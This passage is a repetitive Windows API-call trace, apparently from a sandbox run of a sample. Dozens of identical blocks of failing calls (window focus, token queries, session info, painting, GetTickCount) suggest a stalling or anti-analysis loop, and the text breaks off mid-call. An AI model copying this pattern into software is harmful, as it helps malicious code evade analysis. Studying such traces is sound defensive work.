[0072.430] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.430] SetForegroundWindow (hWnd=0x0) returned 0 [0072.430] BringWindowToTop (hWnd=0x0) returned 0 [0072.430] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5d8) returned 1 [0072.430] GetTokenInformation (in: TokenHandle=0x5d8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.430] GetLastError () returned 0x7a [0072.430] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.430] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.431] WTSFreeMemory (pMemory=0x0) [0072.431] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.431] TextOutW (hdc=0x0, x=2344, y=5624, lpString="", c=0) returned 1 [0072.431] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.431] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.431] GetTickCount () returned 0x1f325 [0072.433] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.433] SetForegroundWindow (hWnd=0x0) returned 0 [0072.433] BringWindowToTop (hWnd=0x0) returned 0 [0072.433] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5dc) returned 1 [0072.433] GetTokenInformation (in: TokenHandle=0x5dc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.434] GetLastError () returned 0x7a [0072.434] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.434] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.434] WTSFreeMemory (pMemory=0x0) [0072.434] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.434] TextOutW (hdc=0x0, x=2354, y=5649, lpString="", c=0) returned 1 [0072.434] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.434] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.434] GetTickCount () returned 0x1f325 [0072.436] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.436] SetForegroundWindow (hWnd=0x0) returned 0 [0072.436] BringWindowToTop (hWnd=0x0) returned 0 [0072.436] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5e0) returned 1 [0072.436] GetTokenInformation (in: TokenHandle=0x5e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.436] GetLastError () returned 0x7a [0072.436] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.436] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.437] WTSFreeMemory (pMemory=0x0) [0072.437] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.437] TextOutW (hdc=0x0, x=2364, y=5674, lpString="", c=0) returned 1 [0072.437] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.437] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.437] GetTickCount () returned 0x1f325 [0072.437] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.438] SetForegroundWindow (hWnd=0x0) returned 0 [0072.438] BringWindowToTop (hWnd=0x0) returned 0 [0072.438] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5e4) returned 1 [0072.438] GetTokenInformation (in: TokenHandle=0x5e4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.438] GetLastError () returned 0x7a [0072.438] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.438] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.438] WTSFreeMemory (pMemory=0x0) [0072.438] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.438] TextOutW (hdc=0x0, x=2374, y=5699, lpString="", c=0) returned 1 [0072.439] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.439] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.439] GetTickCount () returned 0x1f325 [0072.439] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.439] SetForegroundWindow (hWnd=0x0) returned 0 [0072.439] BringWindowToTop (hWnd=0x0) returned 0 [0072.439] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5e8) returned 1 [0072.440] GetTokenInformation (in: TokenHandle=0x5e8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.440] GetLastError () returned 0x7a [0072.440] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.440] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.440] WTSFreeMemory (pMemory=0x0) [0072.440] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.440] TextOutW (hdc=0x0, x=2384, y=5724, lpString="", c=0) returned 1 [0072.441] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.441] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.441] GetTickCount () returned 0x1f334 [0072.441] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.441] SetForegroundWindow (hWnd=0x0) returned 0 [0072.441] BringWindowToTop (hWnd=0x0) returned 0 [0072.442] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5ec) returned 1 [0072.442] GetTokenInformation (in: TokenHandle=0x5ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.442] GetLastError () returned 0x7a [0072.442] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.442] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.442] WTSFreeMemory (pMemory=0x0) [0072.442] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.442] TextOutW (hdc=0x0, x=2394, y=5749, lpString="", c=0) returned 1 [0072.442] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.442] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.443] GetTickCount () returned 0x1f334 [0072.443] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.443] SetForegroundWindow (hWnd=0x0) returned 0 [0072.443] BringWindowToTop (hWnd=0x0) returned 0 [0072.443] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5f0) returned 1 [0072.444] GetTokenInformation (in: TokenHandle=0x5f0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.444] GetLastError () returned 0x7a [0072.444] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.444] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.444] WTSFreeMemory (pMemory=0x0) [0072.444] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.444] TextOutW (hdc=0x0, x=2404, y=5774, lpString="", c=0) returned 1 [0072.444] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.444] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.444] GetTickCount () returned 0x1f334 [0072.445] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.445] SetForegroundWindow (hWnd=0x0) returned 0 [0072.446] BringWindowToTop (hWnd=0x0) returned 0 [0072.446] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5f4) returned 1 [0072.446] GetTokenInformation (in: TokenHandle=0x5f4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.446] GetLastError () returned 0x7a [0072.446] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.446] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.446] WTSFreeMemory (pMemory=0x0) [0072.446] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.446] TextOutW (hdc=0x0, x=2414, y=5799, lpString="", c=0) returned 1 [0072.446] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.447] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.447] GetTickCount () returned 0x1f334 [0072.448] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.448] SetForegroundWindow (hWnd=0x0) returned 0 [0072.448] BringWindowToTop (hWnd=0x0) returned 0 [0072.448] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5f8) returned 1 [0072.448] GetTokenInformation (in: TokenHandle=0x5f8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.448] GetLastError () returned 0x7a [0072.448] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.448] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.449] WTSFreeMemory (pMemory=0x0) [0072.449] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.449] TextOutW (hdc=0x0, x=2424, y=5824, lpString="", c=0) returned 1 [0072.449] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.449] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.449] GetTickCount () returned 0x1f334 [0072.450] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.450] SetForegroundWindow (hWnd=0x0) returned 0 [0072.450] BringWindowToTop (hWnd=0x0) returned 0 [0072.450] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x5fc) returned 1 [0072.450] GetTokenInformation (in: TokenHandle=0x5fc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.450] GetLastError () returned 0x7a [0072.450] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.450] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.450] WTSFreeMemory (pMemory=0x0) [0072.450] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.450] TextOutW (hdc=0x0, x=2434, y=5849, lpString="", c=0) returned 1 [0072.450] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.450] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.451] GetTickCount () returned 0x1f334 [0072.451] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.451] SetForegroundWindow (hWnd=0x0) returned 0 [0072.451] BringWindowToTop (hWnd=0x0) returned 0 [0072.451] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x600) returned 1 [0072.451] GetTokenInformation (in: TokenHandle=0x600, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.451] GetLastError () returned 0x7a [0072.451] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.451] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.452] WTSFreeMemory (pMemory=0x0) [0072.452] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.452] TextOutW (hdc=0x0, x=2444, y=5874, lpString="", c=0) returned 1 [0072.452] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.452] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.452] GetTickCount () returned 0x1f334 [0072.452] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.452] SetForegroundWindow (hWnd=0x0) returned 0 [0072.453] BringWindowToTop (hWnd=0x0) returned 0 [0072.453] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x604) returned 1 [0072.453] GetTokenInformation (in: TokenHandle=0x604, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.453] GetLastError () returned 0x7a [0072.453] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.453] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.453] WTSFreeMemory (pMemory=0x0) [0072.453] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.453] TextOutW (hdc=0x0, x=2454, y=5899, lpString="", c=0) returned 1 [0072.453] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.453] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.453] GetTickCount () returned 0x1f334 [0072.454] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.454] SetForegroundWindow (hWnd=0x0) returned 0 [0072.454] BringWindowToTop (hWnd=0x0) returned 0 [0072.454] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x608) returned 1 [0072.454] GetTokenInformation (in: TokenHandle=0x608, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.455] GetLastError () returned 0x7a [0072.455] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.455] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.455] WTSFreeMemory (pMemory=0x0) [0072.455] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.455] TextOutW (hdc=0x0, x=2464, y=5924, lpString="", c=0) returned 1 [0072.455] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.455] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.455] GetTickCount () returned 0x1f334 [0072.456] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.457] SetForegroundWindow (hWnd=0x0) returned 0 [0072.457] BringWindowToTop (hWnd=0x0) returned 0 [0072.457] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x60c) returned 1 [0072.457] GetTokenInformation (in: TokenHandle=0x60c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.457] GetLastError () returned 0x7a [0072.457] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.457] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.457] WTSFreeMemory (pMemory=0x0) [0072.457] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.457] TextOutW (hdc=0x0, x=2474, y=5949, lpString="", c=0) returned 1 [0072.457] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.457] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.457] GetTickCount () returned 0x1f344 [0072.458] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.458] SetForegroundWindow (hWnd=0x0) returned 0 [0072.458] BringWindowToTop (hWnd=0x0) returned 0 [0072.458] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x610) returned 1 [0072.458] GetTokenInformation (in: TokenHandle=0x610, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.458] GetLastError () returned 0x7a [0072.458] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.458] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.459] WTSFreeMemory (pMemory=0x0) [0072.459] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.459] TextOutW (hdc=0x0, x=2484, y=5974, lpString="", c=0) returned 1 [0072.459] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.459] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.459] GetTickCount () returned 0x1f344 [0072.460] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.460] SetForegroundWindow (hWnd=0x0) returned 0 [0072.460] BringWindowToTop (hWnd=0x0) returned 0 [0072.460] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x614) returned 1 [0072.460] GetTokenInformation (in: TokenHandle=0x614, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.460] GetLastError () returned 0x7a [0072.460] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.460] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.461] WTSFreeMemory (pMemory=0x0) [0072.461] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.461] TextOutW (hdc=0x0, x=2494, y=5999, lpString="", c=0) returned 1 [0072.461] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.461] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.461] GetTickCount () returned 0x1f344 [0072.462] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.462] SetForegroundWindow (hWnd=0x0) returned 0 [0072.462] BringWindowToTop (hWnd=0x0) returned 0 [0072.462] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x618) returned 1 [0072.462] GetTokenInformation (in: TokenHandle=0x618, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.462] GetLastError () returned 0x7a [0072.462] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.462] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.462] WTSFreeMemory (pMemory=0x0) [0072.462] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.462] TextOutW (hdc=0x0, x=2504, y=6024, lpString="", c=0) returned 1 [0072.462] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.463] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.463] GetTickCount () returned 0x1f344 [0072.463] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.463] SetForegroundWindow (hWnd=0x0) returned 0 [0072.463] BringWindowToTop (hWnd=0x0) returned 0 [0072.463] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x61c) returned 1 [0072.463] GetTokenInformation (in: TokenHandle=0x61c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.463] GetLastError () returned 0x7a [0072.463] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.464] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.464] WTSFreeMemory (pMemory=0x0) [0072.464] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.464] TextOutW (hdc=0x0, x=2514, y=6049, lpString="", c=0) returned 1 [0072.464] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.464] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.464] GetTickCount () returned 0x1f344 [0072.466] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.466] SetForegroundWindow (hWnd=0x0) returned 0 [0072.466] BringWindowToTop (hWnd=0x0) returned 0 [0072.466] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x620) returned 1 [0072.466] GetTokenInformation (in: TokenHandle=0x620, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.466] GetLastError () returned 0x7a [0072.466] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.466] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.466] WTSFreeMemory (pMemory=0x0) [0072.466] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.466] TextOutW (hdc=0x0, x=2524, y=6074, lpString="", c=0) returned 1 [0072.467] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.467] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.467] GetTickCount () returned 0x1f344 [0072.468] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.468] SetForegroundWindow (hWnd=0x0) returned 0 [0072.468] BringWindowToTop (hWnd=0x0) returned 0 [0072.468] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x624) returned 1 [0072.468] GetTokenInformation (in: TokenHandle=0x624, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.468] GetLastError () returned 0x7a [0072.468] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.468] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.468] WTSFreeMemory (pMemory=0x0) [0072.468] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.468] TextOutW (hdc=0x0, 